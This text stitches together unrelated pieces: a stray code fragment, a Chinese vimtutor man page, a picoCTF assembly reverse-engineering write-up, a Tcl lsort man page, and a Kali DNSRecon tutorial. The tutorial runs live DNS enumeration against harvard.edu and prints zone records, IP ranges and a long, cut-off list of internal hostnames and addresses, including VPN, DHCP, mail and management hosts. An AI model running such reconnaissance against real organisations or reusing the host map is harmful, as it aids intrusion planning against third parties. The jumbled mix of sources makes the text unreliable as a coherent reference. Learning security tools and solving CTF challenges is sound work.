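    f.write(payload)
```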
.TH VIMTUTOR 1 "1998 December 28"
.SH NAME
vimtutor \- the Vim tutor
.SH SYNOPSIS
.br
.B vimtutor
.SH DESCRIPTION
.B Vimtutor
starts the
.B Vim
tutor. It first makes a copy of the tutor file, so that the working copy can be modified without changing the original file.
.PP
.B Vimtutor
is useful for people who want to learn some basic
.B Vim
commands.
.PP
This command takes no options or arguments.
.B Vim
is always started in Vi compatible mode.
.SH FILES
.TP 15
/usr/share/vim/vim56/tutor/tutor
The
.B Vimtutor
text file.
.SH AUTHOR
.B Vimtutor
was originally written for Vi by Michael C. Pierce and Robert K. Ware of the Colorado School of Mines, based on ideas contributed by Charles Smith of Colorado State University. E-mail: bware@mines.colorado.edu.
.br
It was modified for
.B Vim
by Bram Moolenaar.
.SH "SEE ALSO"
vim(1)
.SH "[Chinese version maintainer]"
.B 唐友 \<tony_ty@263.net\>
.SH "[Chinese version last updated]"
.BR 2001/9/3
.SH "China Linux Forum man pages translation project"
.BI http://cmpp.linuxforum.net
# asm4 Reverse Engineering, 400 points ## Description: > What will asm4("picoCTF_75806") return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. ```assembly asm4: <+0>: push ebp <+1>: mov ebp,esp <+3>: push ebx <+4>: sub esp,0x10 <+7>: mov DWORD PTR [ebp-0x10],0x276 <+14>: mov DWORD PTR [ebp-0xc],0x0 <+21>: jmp 0x518 <asm4+27> <+23>: add DWORD PTR [ebp-0xc],0x1 <+27>: mov edx,DWORD PTR [ebp-0xc] <+30>: mov eax,DWORD PTR [ebp+0x8] <+33>: add eax,edx <+35>: movzx eax,BYTE PTR [eax] <+38>: test al,al <+40>: jne 0x514 <asm4+23> <+42>: mov DWORD PTR [ebp-0x8],0x1 <+49>: jmp 0x587 <asm4+138> <+51>: mov edx,DWORD PTR [ebp-0x8] <+54>: mov eax,DWORD PTR [ebp+0x8] <+57>: add eax,edx <+59>: movzx eax,BYTE PTR [eax] <+62>: movsx edx,al <+65>: mov eax,DWORD PTR [ebp-0x8] <+68>: lea ecx,[eax-0x1] <+71>: mov eax,DWORD PTR [ebp+0x8] <+74>: add eax,ecx <+76>: movzx eax,BYTE PTR [eax] <+79>: movsx eax,al <+82>: sub edx,eax <+84>: mov eax,edx <+86>: mov edx,eax <+88>: mov eax,DWORD PTR [ebp-0x10] <+91>: lea ebx,[edx+eax*1] <+94>: mov eax,DWORD PTR [ebp-0x8] <+97>: lea edx,[eax+0x1] <+100>: mov eax,DWORD PTR [ebp+0x8] <+103>: add eax,edx <+105>: movzx eax,BYTE PTR [eax] <+108>: movsx edx,al <+111>: mov ecx,DWORD PTR [ebp-0x8] <+114>: mov eax,DWORD PTR [ebp+0x8] <+117>: add eax,ecx <+119>: movzx eax,BYTE PTR [eax] <+122>: movsx eax,al <+125>: sub edx,eax <+127>: mov eax,edx <+129>: add eax,ebx <+131>: mov DWORD PTR [ebp-0x10],eax <+134>: add DWORD PTR [ebp-0x8],0x1 <+138>: mov eax,DWORD PTR [ebp-0xc] <+141>: sub eax,0x1 <+144>: cmp DWORD PTR [ebp-0x8],eax <+147>: jl 0x530 <asm4+51> <+149>: mov eax,DWORD PTR [ebp-0x10] <+152>: add esp,0x10 <+155>: pop ebx <+156>: pop ebp <+157>: ret ``` ## Solution: Since this logic is long and complex, we'll just compile it and receive the answer by running it. 
We can compile the function into a C file using the following syntax ([reference](https://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html)): ```c #include <stdio.h> #include <stdlib.h> int asm4(char* in) { int val; asm ( "nop;" "nop;" "nop;" //"push ebp;" //"mov ebp,esp;" "push ebx;" "sub esp,0x10;" "mov DWORD PTR [ebp-0x10],0x276;" "mov DWORD PTR [ebp-0xc],0x0;" "jmp _asm_27;" "_asm_23:" "add DWORD PTR [ebp-0xc],0x1;" "_asm_27:" "mov edx,DWORD PTR [ebp-0xc];" "mov eax,DWORD PTR [%[pInput]];" "add eax,edx;" "movzx eax,BYTE PTR [eax];" "test al,al;" "jne _asm_23;" "mov DWORD PTR [ebp-0x8],0x1;" "jmp _asm_138;" "_asm_51:" "mov edx,DWORD PTR [ebp-0x8];" "mov eax,DWORD PTR [%[pInput]];" "add eax,edx;" "movzx eax,BYTE PTR [eax];" "movsx edx,al;" "mov eax,DWORD PTR [ebp-0x8];" "lea ecx,[eax-0x1];" "mov eax,DWORD PTR [%[pInput]];" "add eax,ecx;" "movzx eax,BYTE PTR [eax];" "movsx eax,al;" "sub edx,eax;" "mov eax,edx;" "mov edx,eax;" "mov eax,DWORD PTR [ebp-0x10];" "lea ebx,[edx+eax*1];" "mov eax,DWORD PTR [ebp-0x8];" "lea edx,[eax+0x1];" "mov eax,DWORD PTR [%[pInput]];" "add eax,edx;" "movzx eax,BYTE PTR [eax];" "movsx edx,al;" "mov ecx,DWORD PTR [ebp-0x8];" "mov eax,DWORD PTR [%[pInput]];" "add eax,ecx;" "movzx eax,BYTE PTR [eax];" "movsx eax,al;" "sub edx,eax;" "mov eax,edx;" "add eax,ebx;" "mov DWORD PTR [ebp-0x10],eax;" "add DWORD PTR [ebp-0x8],0x1;" "_asm_138:" "mov eax,DWORD PTR [ebp-0xc];" "sub eax,0x1;" "cmp DWORD PTR [ebp-0x8],eax;" "jl _asm_51;" "mov eax,DWORD PTR [ebp-0x10];" "add esp,0x10;" "pop ebx;" //"pop ebp;" //"ret ;" "nop;" "nop;" "nop;" :"=r"(val) : [pInput] "m"(in) ); return val; } int main(int argc, char** argv) { printf("0x%x\n", asm4("picoCTF_75806")); return 0; } ``` Note that jumps were ported to use labels, the input parameter was renamed and the frame setup and teardown were already taken care of by the compiler and therefore commented out in the assembly. The `nop`s were inserted in order to make it easier to locate the inline assembly with a debugger or disassembler. An alternative was to use a dedicated assembly file as we did in [asm3](asm3.md). We compile the program with: ```console root@kali:/media/sf_CTFs/pico/asm4# gcc -masm=intel -m32 solution.c -o solution root@kali:/media/sf_CTFs/pico/asm4# ``` And run it: ```console root@kali:/media/sf_CTFs/pico/asm4# ./solution 0x203 ```
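As a sanity check, the loop can also be re-implemented in a few lines of Python (a sketch that mirrors the disassembly directly, independent of the compiled binary). The accumulator starts at 0x276, and each iteration adds `(s[i] - s[i-1]) + (s[i+1] - s[i])`, which telescopes to `(s[-1] + s[-2]) - (s[0] + s[1])`:

```python
def asm4(s: bytes) -> int:
    # Mirrors the disassembly: acc starts at 0x276, then for every index i
    # in [1, len-2] it adds (s[i] - s[i-1]) + (s[i+1] - s[i]).
    acc = 0x276
    for i in range(1, len(s) - 1):
        acc += (s[i] - s[i - 1]) + (s[i + 1] - s[i])
    return acc & 0xFFFFFFFF

print(hex(asm4(b"picoCTF_75806")))  # prints 0x203, matching the run above
```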
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" Copyright (c) 1999 Scriptics Corporation '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: lsort.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: lsort.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. 
.ie !\\n(^b-1 \{\
\h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul'
.\}
.el \}\
\h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul'
.\}
.\}
.fi
.br
.nr ^b 0
..
'\" # VS - start vertical sidebar
'\" # ^Y = starting y location
'\" # ^v = 1 (for troff; for nroff this doesn't matter)
.de VS
.if !"\\$2"" .br
.mk ^Y
.ie n 'mc \s12\(br\s0
.el .nr ^v 1u
..
'\" # VE - end of vertical sidebar
.de VE
.ie n 'mc
.el \{\
.ev 2
.nf
.ti 0
.mk ^t
\h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n'
.sp -1
.fi
.ev
.\}
.nr ^v 0
..
'\" # Special macro to handle page bottom: finish off current
'\" # box/sidebar if in box/sidebar mode, then invoked standard
'\" # page bottom macro.
.de ^B
.ev 2
'ti 0
'nf
.mk ^t
.if \\n(^b \{\
.\" Draw three-sided box if this is the box's first page,
.\" draw two sides but no top otherwise.
.ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c
.el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c
.\}
.if \\n(^v \{\
.nr ^x \\n(^tu+1v-\\n(^Yu
\kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c
.\}
.bp
'fi
.ev
.if \\n(^b \{\
.mk ^y
.nr ^b 2
.\}
.if \\n(^v \{\
.mk ^Y
.\}
..
'\" # DS - begin display
.de DS
.RS
.nf
.sp
..
'\" # DE - end display
.de DE
.fi
.RE
.sp
..
'\" # SO - start of list of standard options
.de SO
.SH "STANDARD OPTIONS"
.LP
.nf
.ta 5.5c 11c
.ft B
..
'\" # SE - end of list of standard options
.de SE
.fi
.ft R
.LP
See the \\fBoptions\\fR manual entry for details on the standard options.
..
'\" # OP - start of full description for a single option
.de OP
.LP
.nf
.ta 4c
Command-Line Name: \\fB\\$1\\fR
Database Name: \\fB\\$2\\fR
Database Class: \\fB\\$3\\fR
.fi
.IP
..
'\" # CS - begin code excerpt
.de CS
.RS
.nf
.ta .25i .5i .75i 1i
..
'\" # CE - end code excerpt
.de CE
.fi
.RE
..
.de UL
\\$1\l'|0\(ul'\\$2
..
.TH lsort 3tcl 8.3 Tcl "Tcl Built-In Commands"
.BS
'\" Note: do not modify the .SH NAME line immediately below!
.SH NAME
lsort \- Sort the elements of a list
.SH "SYNOPSIS"
\fBlsort \fR?\fIoptions\fR? \fIlist\fR
.BE
.SH "DESCRIPTION"
.PP
This command sorts the elements of \fIlist\fR, returning a new list whose elements are in sorted order. The \fBlsort\fR command is implemented using the merge-sort algorithm, a stable sort with O(n log n) performance characteristics.
.PP
By default ASCII sorting is used, with the result returned in increasing order. However, any of the following arguments may be specified before \fIlist\fR to control the sorting process (unique abbreviations are accepted):
.TP 20
\fB\-ascii\fR
Use string comparison with the ASCII collation order. This is the default.
.TP 20
\fB\-dictionary\fR
Use dictionary-style comparison. This is the same as \fB-ascii\fR except that (a) case is ignored except as a tie-breaker, and (b) if two strings contain embedded numbers, the numbers compare as integers, not characters. For example, in \fB-dictionary\fR mode, \fBbigBoy\fR sorts between \fBbigbang\fR and \fBbigboy\fR, and \fBx10y\fR sorts between \fBx9y\fR and \fBx11y\fR.
.TP 20
\fB\-integer\fR
Convert list elements to integers and use integer comparison.
.TP 20
\fB\-real\fR
Convert list elements to floating-point values and use floating comparison.
.TP 20
\fB\-command\0\fIcommand\fR
Use \fIcommand\fR as a comparison command. To compare two elements, a Tcl script consisting of \fIcommand\fR with the two elements appended as additional arguments is evaluated. The script should return an integer less than, equal to, or greater than zero if the first element is considered to be respectively less than, equal to, or greater than the second.
.TP 20
\fB\-increasing\fR
Sort the list in increasing order ("smallest" items first). This is the default.
.TP 20
\fB\-decreasing\fR
Sort the list in decreasing order ("largest" items first).
.TP 20
\fB\-index\0\fIindex\fR
If this option is specified, each of the elements of \fIlist\fR must itself be a proper Tcl sublist. Instead of sorting based on whole sublists, \fBlsort\fR will extract the \fIindex\fR'th element from each sublist and sort based on that element. The keyword \fBend\fR is allowed for \fIindex\fR to sort on the last sublist element,
.VS 8.3.4
and \fBend-\fIindex\fR sorts on a sublist element offset from the end
.VE
. For example,
.RS
.CS
lsort -integer -index 1 {{First 24} {Second 18} {Third 30}}
.CE
returns \fB{Second 18} {First 24} {Third 30}\fR, and
.VS 8.3.4
'\"
'\" This example is from the test suite!
'\"
.CS
lsort -index end-1 {{a 1 e i} {b 2 3 f g} {c 4 5 6 d h}}
.CE
returns \fB{c 4 5 6 d h} {a 1 e i} {b 2 3 f g}\fR.
.VE
This option is much more efficient than achieving the same effect with \fB\-command\fR.
.RE
.TP 20
\fB\-unique\fR
If this option is specified, then only the last set of duplicate elements found in the list will be retained. Note that duplicates are determined relative to the comparison used in the sort. Thus if \fI\-index 0\fR is used, \fB{1 a}\fR and \fB{1 b}\fR would be considered duplicates and only the second element, \fB{1 b}\fR, would be retained.
.SH "NOTES"
.PP
The options to \fBlsort\fR only control what sort of comparison is used, and do not necessarily constrain what the values themselves actually are. This distinction is only noticeable when the list to be sorted has fewer than two elements.
.PP
The \fBlsort\fR command is reentrant, meaning it is safe to use as part of the implementation of a command used in the \fB\-command\fR option.
.SH "EXAMPLES"
.PP
Sorting a list using ASCII sorting:
.CS
% lsort {a10 B2 b1 a1 a2}
B2 a1 a10 a2 b1
.CE
.PP
Sorting a list using Dictionary sorting:
.CS
% lsort -dictionary {a10 B2 b1 a1 a2}
a1 a2 a10 b1 B2
.CE
.PP
Sorting lists of integers:
.CS
% lsort -integer {5 3 1 2 11 4}
1 2 3 4 5 11
% lsort -integer {1 2 0x5 7 0 4 -1}
-1 0 1 2 4 0x5 7
.CE
.PP
Sorting lists of floating-point numbers:
.CS
% lsort -real {5 3 1 2 11 4}
1 2 3 4 5 11
% lsort -real {.5 0.07e1 0.4 6e-1}
0.4 .5 6e-1 0.07e1
.CE
.PP
Sorting using indices:
.CS
% # Note the space character before the c
% lsort {{a 5} { c 3} {b 4} {e 1} {d 2}}
{ c 3} {a 5} {b 4} {d 2} {e 1}
% lsort -index 0 {{a 5} { c 3} {b 4} {e 1} {d 2}}
{a 5} {b 4} { c 3} {d 2} {e 1}
% lsort -index 1 {{a 5} { c 3} {b 4} {e 1} {d 2}}
{e 1} {d 2} { c 3} {b 4} {a 5}
.CE
.PP
Stripping duplicate values using sorting:
.CS
% lsort -unique {a b c a b c a b c}
a b c
.CE
.PP
More complex sorting using a comparison function:
.CS
% proc compare {a b} {
    set a0 [lindex $a 0]
    set b0 [lindex $b 0]
    if {$a0 < $b0} {
        return -1
    } elseif {$a0 > $b0} {
        return 1
    }
    return [string compare [lindex $a 1] [lindex $b 1]]
}
% lsort -command compare \\
        {{3 apple} {0x2 carrot} {1 dingo} {2 banana}}
{1 dingo} {2 banana} {0x2 carrot} {3 apple}
.CE
.SH "SEE ALSO"
lappend(n), lindex(n), linsert(n), list(n), llength(n), lrange(n), lreplace(n), lsearch(n)
.SH "KEYWORDS"
element, list, order, sort
.SH "[Chinese version maintainer]"
.B 寒蝉退士
.SH "[Chinese version last updated]"
.B 2001/09/06
.SH "China Linux Forum man pages translation project:"
.BI http://cmpp.linuxforum.net
---
title: DNSRecon
categories: Information Gathering
tags: [kali linux,dnsrecon,information gathering,recon,dns]
date: 2016-10-21 06:00:00
---

0x00 Introduction to DNSRecon
-------------

DNSRecon provides the following capabilities:

```plain
Check all NS records for zone transfers
Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
Perform common SRV record enumeration and top-level domain (TLD) expansion
Wildcard support
Brute-force subdomain and host A and AAAA records given a domain and a wordlist
Perform PTR record lookups for a given IP range or CIDR
Check a DNS server's cached records for A, AAAA and CNAME records
Enumerate common mDNS records on the local network, enumerate hosts, and search Google for subdomains
```

Tool source: DNSRecon README

[DNSRecon homepage][1] | [Kali DNSRecon repo][2]

- Author: Carlos Perez
- License: GPLv2

[DNSRecon video introduction][3]

0x01 DNSRecon features
---------------

dnsrecon - a powerful DNS enumeration script

```shell
Options:
-n, --name_server
-D, --dictionary
-f  Filter out IP addresses that resolve to the wildcard-defined IP when saving records
root@kali:~# dnsrecon
Version: 0.8.10
Usage: dnsrecon.py <options>

Options:
   -h, --help                  Show this help message and exit
   -d, --domain      <domain>  Target domain to enumerate
   -r, --range       <range>   IP range for reverse lookup brute force, in the form (first IP-last IP) or (range/bitmask)
   -n, --name_server <name>    Domain server to use; if none is given, the target's SOA will be used
   -D, --dictionary  <file>    Dictionary file of subdomains and hostnames to use for brute force
   -f                          Filter out of the brute force domain lookup, records that resolve to the
                               wildcard-defined IP address when saving records
   -t, --type        <types>   Type of enumeration to perform:
                               std       Query SOA, NS, A, AAAA, MX and SRV records (if the AXFR request to the NS servers fails)
                               rvl       Reverse lookup of a given CIDR or IP range
                               brt       Brute force domains and hosts using a given dictionary file
                               srv       SRV records
                               axfr      Test all NS servers for a zone transfer
                               goo       Perform a Google search for subdomains and hosts
                               snoop     Perform cache snooping against all NS servers for a given domain, testing
                                         all servers with a file containing the domains; file given with the -D option
                               tld       Remove the TLD of the given domain and test against all TLDs registered in IANA
                               zonewalk  Perform a DNSSEC zone walk using NSEC records
   -a                          Perform AXFR with the standard enumeration
   -s                          Perform a reverse lookup of IPv4 ranges in the SPF record with the standard enumeration
   -g                          Perform Google enumeration with the standard enumeration
   -w                          Perform deep whois record analysis and reverse lookup of IP ranges with the standard enumeration
   -z                          Perform a DNSSEC zone walk with the standard enumeration
   --threads         <number>  Number of threads to use in reverse lookups, forward lookups, brute force and SRV record enumeration
   --lifetime        <number>  Time to wait for a server to respond to a query
   --db              <file>    SQLite3 file to save found records
   --xml             <file>    XML file to save found records
   --iw                        Continue brute forcing a domain even if a wildcard record is found
   -c, --csv         <file>    Save output to a comma-separated-value file
   -j, --json        <file>    Save output to a JSON file
   -v                          Show attempts in the brute force modes
```

<!--more-->

0x02 DNSRecon usage example
-----------------

```shell
root@kali:~# dnsrecon -d harvard.edu -D /usr/share/wordlists/dnsmap.txt -t std -w --threads=10 --lifetime=20 --xml=test.xml -v
[*] Performing General Enumeration of Domain:
[-] DNSSEC is not configured for harvard.edu
[*] SOA int-dns-2.harvard.edu 128.103.201.105
[*] NS ext-dns-1.harvard.edu 128.103.200.35
[-] Recursion enabled on NS Server 128.103.200.35
[*] NS ext-dns-2.harvard.edu 128.103.200.162
[-] Recursion enabled on NS Server 128.103.200.162
[*] MX mx0b-00171101.pphosted.com 67.231.156.27
[*] A harvard.edu 52.87.36.185
[*] A harvard.edu 52.87.67.209
[*] Enumerating SRV Records
[*] SRV _sip._tls.harvard.edu sipdir.online.lync.com 66.119.157.212 443 0
[*] SRV _sip._tls.harvard.edu sipdir.online.lync.com 2603:1047:0:2::b 443 0
[*] SRV _sipfederationtls._tcp.harvard.edu sipfed.online.lync.com 52.113.64.139 5061 0
[*] SRV _sipfederationtls._tcp.harvard.edu sipfed.online.lync.com 2603:1047:0:2::b 5061 0
[*] SRV _h323cs._tcp.harvard.edu vcsecluster01.noc.harvard.edu 128.103.247.202 1720 0
[*] SRV _h323cs._tcp.harvard.edu vcsecluster01.noc.harvard.edu 128.103.247.201 1720 0
[*] SRV _sip._udp.harvard.edu vcsecluster01.noc.harvard.edu no_ip 5060 0
[*] SRV _sips._tcp.harvard.edu harvuni-expe01-sc1.uc.harvard.edu no_ip 5061 10
[*] SRV _sips._tcp.harvard.edu harvuni-expe01-bv1.uc.harvard.edu 63.69.76.6 5061 10
[*] 9 Records Found
[*] Performing Whois lookup against records found.
[*] The following IP Ranges where found:
[*]      0) 128.103.0.0-128.103.255.255 Harvard University
[*]      1) 67.231.144.0-67.231.159.255 Proofpoint, Inc.
[*]      2) 52.84.0.0-52.95.255.255 Amazon Technologies Inc.
[*]      3) 66.119.144.0-66.119.159.255 Microsoft Corporation
[*]      4) 52.96.0.0-52.115.255.255 Microsoft Corporation
[*]      5) 63.69.76.0-63.69.77.255 Logistics Management Institute
[*] What Range do you wish to do a Revers Lookup for?
[*] number, comma separated list, a for all or n for none 0 [*] Harvard University [*] Performing Reverse Lookup of range 128.103.0.0-128.103.255.255 [*] Performing Reverse Lookup from 128.103.0.0 to 128.103.255.255 [*] PTR lmagw1-te-7-3-core.nox.org 128.103.0.74 [*] PTR int-dns-3.harvard.edu 128.103.1.5 [*] PTR endrun2-10wa.noc.harvard.edu 128.103.1.6 [*] PTR time.harvard.edu 128.103.1.6 [*] PTR internaldns-b3-n2.harvard.edu 128.103.1.10 [*] PTR internaldns-b3-n2-ha.harvard.edu 128.103.1.11 [*] PTR int-dns-3-node1.harvard.edu 128.103.1.12 [*] PTR int-dns-3-node1-ha.harvard.edu 128.103.1.13 [*] PTR int-dns-3-node2.harvard.edu 128.103.1.14 [*] PTR vpn.noc.harvard.edu 128.103.1.20 [*] PTR vpn5.harvard.edu 128.103.1.20 [*] PTR time.harvard.edu 128.103.1.35 [*] PTR endrun3-10wa.noc.harvard.edu 128.103.1.35 [*] PTR netopc.harvard.edu 128.103.1.37 [*] PTR registration.noc.harvard.edu 128.103.1.38 [*] PTR registration-10wa.noc.harvard.edu 128.103.1.38 [*] PTR usedby-reg10wa.noc.harvard.edu 128.103.1.39 [*] PTR new-netopc.harvard.edu 128.103.1.40 [*] PTR test.noc.harvard.edu 128.103.1.42 [*] PTR sms.noc.harvard.edu 128.103.1.44 [*] PTR autoregdev1-10wa.noc.harvard.edu 128.103.1.45 [*] PTR portaldb2.noc.harvard.edu 128.103.1.46 [*] PTR ext2-10wa.noc.harvard.edu 128.103.1.48 [*] PTR portaldb1-10wa.noc.harvard.edu 128.103.1.51 [*] PTR jnc-10wa.noc.harvard.edu 128.103.1.56 [*] PTR rest-dev.noc.harvard.edu 128.103.1.61 [*] PTR cdn-war10.noc.harvard.edu 128.103.1.133 [*] PTR int-dns-3-node1-mgmt.harvard.edu 128.103.1.178 [*] PTR int-dns-3-node2-mgmt.harvard.edu 128.103.1.179 [*] PTR int-dns-1-node2-mgmt.harvard.edu 128.103.1.195 [*] PTR dhcp-1.harvard.edu 128.103.1.210 [*] PTR dhcp-1-node1.harvard.edu 128.103.1.211 [*] PTR dhcp-1-node1-ha.harvard.edu 128.103.1.212 [*] PTR dhcp-1-node2.harvard.edu 128.103.1.213 [*] PTR dhcp-2.harvard.edu 128.103.1.242 [*] PTR dhcp-2-node1.harvard.edu 128.103.1.243 [*] PTR dhcp-2-node1-ha.harvard.edu 128.103.1.244 [*] PTR dhcp-2-node2.harvard.edu 128.103.1.245 [*] PTR dhcp-2-node2-ha.harvard.edu 128.103.1.246 [*] PTR perdita.harvard.edu 128.103.4.2 [*] PTR iceberg.harvard.edu 128.103.4.3 [*] PTR camelot.harvard.edu 128.103.4.4 [*] PTR paradise.harvard.edu 128.103.4.7 [*] PTR intrigue.harvard.edu 128.103.4.8 [*] PTR mikado.harvard.edu 128.103.4.9 [*] PTR olympiad.harvard.edu 128.103.4.10 [*] PTR tempo.harvard.edu 128.103.4.12 [*] PTR peace.harvard.edu 128.103.4.11 [*] PTR tuscany.harvard.edu 128.103.4.16 [*] PTR troika.harvard.edu 128.103.4.21 [*] PTR pilgrim.harvard.edu 128.103.4.23 [*] PTR broadway.harvard.edu 128.103.4.24 [*] PTR gypsy.harvard.edu 128.103.4.25 [*] PTR winnie2.harvard.edu 128.103.4.26 [*] PTR altissimo.harvard.edu 128.103.4.31 [*] PTR pleasure.harvard.edu 128.103.4.32 [*] PTR tamora.harvard.edu 128.103.4.33 [*] PTR prince.harvard.edu 128.103.4.35 [*] PTR polka.harvard.edu 128.103.4.36 [*] PTR blaze.harvard.edu 128.103.4.37 [*] PTR electron.harvard.edu 128.103.4.40 [*] PTR winnie.harvard.edu 128.103.4.42 [*] PTR lady-x.harvard.edu 128.103.4.43 [*] PTR bologna.harvard.edu 128.103.4.44 [*] PTR corylus.harvard.edu 128.103.4.45 [*] PTR rugosa.harvard.edu 128.103.4.47 [*] PTR tabriz.harvard.edu 128.103.4.48 [*] PTR hansa.harvard.edu 128.103.4.49 [*] PTR mundi.harvard.edu 128.103.4.50 [*] PTR dhcp-0155095169-85-a1.client.fas.harvard.edu 128.103.4.67 [*] PTR geophysics.harvard.edu 128.103.5.5 [*] PTR itis-cmnsvc1.cadm.harvard.edu 128.103.6.5 [*] PTR itis-cmnsvc2.cadm.harvard.edu 128.103.6.6 [*] PTR stage-cdn-ox60.noc.harvard.edu 128.103.6.229 ... 
...一直在探测,十分钟后 ... [*] PTR uhsmtafw1.net.harvard.edu 128.103.252.18 [*] PTR arngw1.harvard.edu 128.103.252.46 [*] PTR hrca-hrcagw-ser3.harvard.edu 128.103.252.50 [*] PTR chs-nat1.harvard.edu 128.103.252.52 [*] PTR hrca-hrcagw-ser6.harvard.edu 128.103.252.53 [*] PTR hrca-orcvegw-ser1.harvard.edu 128.103.252.54 [*] PTR chs-nat4.harvard.edu 128.103.252.55 [*] PTR sergw1.harvard.edu 128.103.252.58 [*] PTR meeigw1.harvard.edu 128.103.252.68 [*] PTR vpn.hks.harvard.edu 128.103.252.68 [*] PTR cfagw1.harvard.edu 128.103.252.90 [*] PTR hbspgw1.harvard.edu 128.103.252.106 [*] PTR harvard-rec-pcitest.fas.harvard.edu 128.103.252.128 [*] PTR webvpn.hks.harvard.edu 128.103.252.155 [*] PTR idmlbvip-stage.huit.harvard.edu 128.103.252.180 [*] PTR idmlbvip-prod.huit.harvard.edu 128.103.252.181 [*] PTR lock.hks.harvard.edu 128.103.253.5 [*] PTR netapp2.hks.harvard.edu 128.103.253.6 [*] PTR netapp.hks.harvard.edu 128.103.253.7 [*] PTR p-papercut-dc1.hks.harvard.edu 128.103.253.9 [*] PTR ppc.hks.harvard.edu 128.103.253.9 [*] PTR hermia1.hks.harvard.edu 128.103.253.12 [*] PTR hermia2.hks.harvard.edu 128.103.253.13 [*] PTR eecrmapp.hks.harvard.edu 128.103.253.16 [*] PTR fabian.hks.harvard.edu 128.103.253.19 [*] PTR outbound1.hks.harvard.edu 128.103.253.20 [*] PTR outbound2.hks.harvard.edu 128.103.253.21 [*] PTR wsus.hks.harvard.edu 128.103.253.26 [*] PTR cvsearch.hks.harvard.edu 128.103.253.28 [*] PTR exed.hks.harvard.edu 128.103.253.37 [*] PTR fta.hks.harvard.edu 128.103.253.38 [*] PTR budget.hks.harvard.edu 128.103.253.40 [*] PTR appmail.hks.harvard.edu 128.103.253.40 [*] PTR mfe1.hks.harvard.edu 128.103.253.43 [*] PTR quince.hks.harvard.edu 128.103.253.47 [*] PTR smtp.hks.harvard.edu 128.103.253.49 [*] PTR imappop.hks.harvard.edu 128.103.253.49 [*] PTR apps.hks.harvard.edu 128.103.253.50 [*] PTR web.hks.harvard.edu 128.103.253.50 [*] PTR mail.hks.harvard.edu 128.103.253.51 [*] PTR legacy.hks.harvard.edu 128.103.253.51 [*] PTR mfeclg.hks.harvard.edu 128.103.253.51 [*] PTR smtp.hks.harvard.edu 128.103.253.52 [*] PTR p-kitefs-dc1.hks.harvard.edu 128.103.253.53 [*] PTR case.hks.harvard.edu 128.103.253.54 [*] PTR qa.cms.hks.harvard.edu 128.103.253.55 [*] PTR admin.qa.www2.hks.harvard.edu 128.103.253.55 [*] PTR 